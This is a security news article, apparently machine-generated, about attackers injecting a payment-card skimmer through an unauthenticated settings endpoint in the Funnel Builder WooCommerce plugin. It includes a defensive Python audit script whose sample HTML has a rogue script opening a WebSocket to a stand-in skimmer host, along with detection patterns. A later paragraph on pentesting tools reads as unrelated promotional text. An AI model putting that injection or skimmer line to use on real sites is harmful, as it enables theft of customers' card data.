Ethical Hacking News

Funnel Builder WordPress Plugin Bug Exploitation: A Critical Threat to E-commerce Security




The Funnel Builder WordPress plugin has been exploited by attackers to steal credit card information from unsuspecting users. The vulnerability affects all versions before 3.15.0.3 and highlights the importance of keeping plugins up-to-date and regularly reviewing settings for potential security threats.



  • The Funnel Builder WordPress plugin has been exploited for stealing sensitive information from unsuspecting users due to a critical vulnerability.
  • The vulnerability can be leveraged without authentication and affects all versions of the plugin before 3.15.0.3.
  • The plugin's features, such as one-click upsells and conversion rate optimization, make it a popular choice among e-commerce site owners.
  • Over 40,000 websites use the Funnel Builder plugin, making it a significant target for attackers.
  • The vulnerability allowed attackers to inject malicious JavaScript snippets into WooCommerce checkout pages, stealing sensitive information including credit card numbers and CVVs.
  • FunnelKit addressed the vulnerability in version 3.15.0.3 and issued a security advisory recommending updates and regular reviews of settings.
  • E-commerce site owners must take immediate action to protect themselves against this vulnerability by ensuring all plugins are up-to-date and reviewing their settings for suspicious activity.



    The security landscape for e-commerce platforms continues to evolve at a rapid pace, with new vulnerabilities being discovered and exploited by malicious actors on an ongoing basis. The latest development in this regard is the exploitation of a critical vulnerability in the Funnel Builder WordPress plugin, which has been actively used to steal sensitive information from unsuspecting users.




    The vulnerability, which has not received an official identifier at this time, can be leveraged without authentication and affects all versions of the Funnel Builder plugin before 3.15.0.3. This means that even website owners who have taken steps to keep their platforms secure may still be vulnerable to attack if they are using an outdated version of the plugin.




    Funnel Builder is a WordPress plugin for WooCommerce Checkout, developed by FunnelKit, and primarily used to customize checkout pages. Features such as one-click upsells, landing pages, and conversion rate optimization make it a popular choice among e-commerce site owners. However, the recent discovery of this vulnerability highlights the importance of keeping all plugins up-to-date and regularly reviewing their settings for potential security threats.




    According to statistics from WordPress.org, the Funnel Builder plugin is active on over 40,000 websites, making it a significant target for attackers. E-commerce security company Sansec detected the malicious activity, which involved injecting malicious JavaScript snippets into WooCommerce checkout pages.




    The root cause was an unprotected, publicly exposed checkout endpoint that allowed attackers to modify the plugin's global settings without authentication. Through it, malicious code was injected into the plugin's "External Scripts" setting, causing arbitrary JavaScript to execute on every checkout page. The injected payload, disguised as a fake Google Tag Manager/Google Analytics script, opened a WebSocket connection to an external location (wss://protect-wss[.]com/ws).




    Sansec reports that the attacker-controlled server delivered a customized payment card skimmer, which stole sensitive information including credit card numbers, CVVs, billing addresses, and other customer data. Payment card skimmers are tools used by threat actors to make fraudulent online purchases, while stolen records often end up sold individually or in bulk on dark web portals known as carding markets.




    FunnelKit addressed the vulnerability in version 3.15.0.3 of Funnel Builder, which was released yesterday. The vendor has issued a security advisory recommending that website owners and administrators prioritize updating to the latest version from the WordPress dashboard and review Settings > Checkout > External Scripts for potential rogue scripts.
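    As an added illustration of the review step above (this is not code from the article, Sansec, or FunnelKit), the Python below takes a rendered checkout page and flags script blocks matching the pattern described: a Google Tag Manager/Analytics lookalike, or an inline script that opens a WebSocket to a host outside the expected Google domains. The sample HTML and the hosts skimmer.example and cdn.example are constructed; the allowlist and name tokens are assumptions a site owner should tune.

```python
import re
from urllib.parse import urlparse

# Hosts a genuine Google Tag Manager / Google Analytics snippet is expected to reach (assumed allowlist).
ALLOWED_HOSTS = {"www.googletagmanager.com", "www.google-analytics.com", "analytics.google.com"}
# Tokens a lookalike loader tends to reuse so it passes a quick visual review (heuristic, tune per site).
GOOGLE_TOKENS = ("googletagmanager", "gtag", "gtm", "analytics")

SCRIPT_TAG = re.compile(r"<script\b([^>]*)>(.*?)</script>", re.IGNORECASE | re.DOTALL)
SRC_ATTR = re.compile(r"""\bsrc\s*=\s*["']([^"']+)["']""", re.IGNORECASE)
WS_CALL = re.compile(r"""new\s+WebSocket\s*\(\s*["'](wss?://[^"']+)["']""", re.IGNORECASE)


def host_of(url: str) -> str:
    """Lower-cased hostname of a URL, or '' if it has none."""
    return (urlparse(url).hostname or "").lower()


def audit_checkout_html(html: str) -> list[tuple[str, str]]:
    """Return (reason, evidence) pairs for script blocks that match the rogue-loader pattern."""
    findings = []
    for attrs, body in SCRIPT_TAG.findall(html):
        src = SRC_ATTR.search(attrs)
        if src:
            url = src.group(1)
            # External script named like a Google tag but served from somewhere else.
            if host_of(url) not in ALLOWED_HOSTS and any(t in url.lower() for t in GOOGLE_TOKENS):
                findings.append(("lookalike-analytics-src", url))
        # Inline script opening a WebSocket to a host that is not on the allowlist.
        for ws_url in WS_CALL.findall(body):
            if host_of(ws_url) not in ALLOWED_HOSTS:
                findings.append(("websocket-to-untrusted-host", ws_url))
    return findings


# Constructed checkout page fragment: one genuine GTM loader, one rogue "GTM" block that
# opens a WebSocket to a made-up host, one lookalike external loader, and one benign script.
SAMPLE_CHECKOUT_HTML = """
<script async src="https://www.googletagmanager.com/gtag/js?id=G-XXXXXXX"></script>
<script>
  /* Google Tag Manager */
  var gtmSocket = new WebSocket("wss://skimmer.example/ws");
</script>
<script src="https://cdn.example/assets/gtm-loader.js"></script>
<script>document.body.classList.add("checkout-ready");</script>
"""

if __name__ == "__main__":
    for reason, evidence in audit_checkout_html(SAMPLE_CHECKOUT_HTML):
        print(f"{reason}: {evidence}")
```

    Run it against the HTML of a live checkout page (or the value stored in the External Scripts setting) and treat every finding as a candidate for manual review rather than proof of compromise.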




    It is essential for e-commerce site owners to take immediate action to protect themselves against this vulnerability. They should ensure that all plugins are up-to-date, including Funnel Builder, and regularly review their settings for any suspicious activity. By taking these steps, they can minimize the risk of being targeted by malicious actors and protect their customers' sensitive information.




    The exploitation of this critical vulnerability highlights the importance of ongoing security monitoring and testing. Automated pentesting tools deliver real value but were built to answer a single question: can an attacker move through the network? They were not designed to test whether your controls block threats, detection rules fire, or cloud configs hold.




    As we continue to navigate the complex landscape of e-commerce security, it is crucial that we prioritize the use of validated tools and techniques. By doing so, we can better protect our platforms and customers from the ever-evolving threat landscape.





    Related Information:
  • https://www.ethicalhackingnews.com/articles/Funnel-Builder-WordPress-Plugin-Bug-Exploitation-A-Critical-Threat-to-E-commerce-Security-ehn.shtml

  • https://www.bleepingcomputer.com/news/security/funnel-builder-wordpress-plugin-bug-exploited-to-steal-credit-cards/


  • Published: Fri May 15 14:36:25 2026 by llama3.2 3B Q4_K_M












